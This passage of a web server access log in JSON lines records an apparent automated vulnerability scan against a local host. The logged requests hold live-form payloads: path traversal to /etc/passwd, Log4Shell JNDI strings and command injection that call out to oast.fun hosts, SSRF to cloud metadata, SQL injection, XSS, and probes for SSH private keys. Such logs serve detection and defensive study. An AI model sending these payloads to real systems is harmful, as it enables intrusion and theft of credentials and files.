Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"type=url&data=http%3A%2F%2Fca285tosmpvbafqg07h0iu9zbuuy13s1b.oast.fun%2F&xmlaction=preview&node=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apimanui/api-manager HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/script?command=|%20nslookup%20ca285tosmpvbafqg07h0zrwboumr3yc45.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"lang=en_US&cat_id=6\x22>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?ajax-request=jnews HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /en-US/splunkd/__raw/services/server/info/server-info?output_mode=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api_docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adjuncts/3a890183/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /final/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/img/custom_icons/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apache-default/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /id_dsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dms/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /embed.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wow-company&tab=http://ca285tosmpvbafqg07h0718dnycrh6a38.oast.fun/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/metadata/instance?api-version=2021-02-01 HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.473","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"username=admin&password=admin&_submit_check=1&jlbqgb7g0x=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sm935/index.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__raw/services/server/info/server-info?output_mode=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /1.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/id_rsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.037","http_user_agent":"${jndi:ldap://127.0.0.1#.${hostName}.useragent.ca285tosmpvbafqg07h0hndnbciebuoim.oast.fun}", "http_referer":"${jndi:ldap://127.0.0.1#.${hostName}.referer.ca285tosmpvbafqg07h0x7dchm4sjduzk.oast.fun}", "request_method":"GET", "http_x_forwarded_for":"${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.ca285tosmpvbafqg07h0mnjjgynysks6z.oast.fun}"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%09/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"{\x22query\x22:\x22# Welcome to GraphiQL\x5Cn#\x5Cn# GraphiQL is an in-browser tool for writing, validating, and\x5Cn# testing GraphQL queries.\x5Cn#\x5Cn# Type queries into this side of the screen, and you will see intelligent\x5Cn# typeaheads aware of the current GraphQL type schema and live syntax and\x5Cn# validation errors highlighted within the text.\x5Cn#\x5Cn# GraphQL queries typically start with a \x5C\x22{\x5C\x22 character. Lines that starts\x5Cn# with a # are ignored.\x5Cn#\x5Cn# An example GraphQL query might look like:\x5Cn#\x5Cn# {\x5Cn# field(arg: \x5C\x22value\x5C\x22) {\x5Cn# subField\x5Cn# }\x5Cn# }\x5Cn#\x5Cn# Keyboard shortcuts:\x5Cn#\x5Cn# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\x5Cn#\x5Cn# Run Query: Ctrl-Enter (or press the play button above)\x5Cn#\x5Cn# Auto Complete: Ctrl-Space (or just start typing)\x5Cn#\x5Cn\x5Cn{\x5Cn users {\x5Cn nodes {\x5Cn id\x5Cn name\x5Cn username\x5Cn }\x5Cn }\x5Cn}\x22,\x22variables\x22:null,\x22operationName\x22:null}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1/-/graphql-explorer", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /host-manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sm/ess.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /core/config/databases.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup.sql 